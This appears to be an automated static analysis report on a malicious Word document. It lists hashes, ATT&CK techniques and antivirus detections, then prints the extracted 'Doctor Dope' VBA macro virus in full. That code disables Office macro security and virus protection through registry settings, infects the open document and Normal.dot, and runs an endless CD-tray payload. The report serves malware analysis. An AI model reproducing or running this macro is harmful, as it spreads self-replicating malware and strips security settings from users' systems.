Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 645bc355541fe714…

MALICIOUS

Office (OLE)

31.0 KB Created: 2023-06-01 03:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8946e1a3f4f34e81d108414fda89e787 SHA-1: c352e024b61207fcb4c94030f76d4ea328dd9151 SHA-256: 645bc355541fe7144d00f53e82e3075a230e4f051433a55e4ba1d6b076a645c5
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a critical indicator of malicious intent. The macro attempts to lower security settings for Microsoft Office applications by modifying registry keys such as 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level' and 'HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM'. It also attempts to infect the active document and the Normal.dot template, suggesting an effort to achieve persistence and spread.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10573 bytes
SHA-256: 845e56e74925395a5c626629ee8d30933a2b19d8b9899f13ebbd57b1f4ea7d71
Detection
ClamAV: Doc.Trojan.Assilem-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DrDope"

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub Document_Open()
On Error Resume Next
'VirusName: Doctor Dope
'coded by Necronomikon[rRlf]
'Info: Written for a friend of mine!We all call him Doctor Dope(Steve)!?;)
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
'--- cut here ---
'this code is taken from XP.Kallisti by jackie/lz0
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
'--- cut here ---
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NT1 = NT.CodeModule.CountOfLines
AD1 = AD.CodeModule.CountOfLines
Nec = 2
If AD.Name <> "ddope" Then
If AD1 > 0 Then _
AD.CodeModule.DeleteLines 1, AD1
Set ToInfect = AD
AD.Name = "ddope"
DoAD = True
End If
If NT.Name <> "ddope" Then
If NT1 > 0 Then _
NT.CodeModule.DeleteLines 1, NT1
Set ToInfect = NT
NT.Name = "ddope"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo bye
If DoNT = True Then
Do While AD.CodeModule.Lines(1, 1) = ""
AD.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While AD.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, AD.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
End If
If DoAD = True Then
Do While NT.CodeModule.Lines(1, 1) = ""
NT.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NT.CodeModule.Lines(Nec, 1) <> ""
ToInfect.CodeModule.InsertLines Nec, NT.CodeModule.Lines(Nec, 1)
Nec = Nec + 1
Loop
End If
bye:
If NT1 <> 0 And AD1 = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
Call Payload
End Sub
Private Sub Payload()
On Error Resume Next
'Thanks WalruS for code!;)
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub

' Processing file: /opt/analyzer/scan_staging/58d599afd5cc441ab082633fb8fadd65.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/DrDope - 5427 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Declare Function mciSendString Lib "winmm.dll" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long)
' Line #2:
' 	FuncDefn (Private Sub Document_Open())
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	QuoteRem 0x0000 0x0016 "VirusName: Doctor Dope"
' Line #5:
' 	QuoteRem 0x0000 0x001B "coded by Necronomikon[rRlf]"
' Line #6:
' 	QuoteRem 0x0000 0x0049 "Info: Written for a friend of mine!We all call him Doctor Dope(Steve)!?;)"
' Line #7:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #8:
' 	Ld wdAlertsNone 
' 	Ld Application 
'
... (truncated)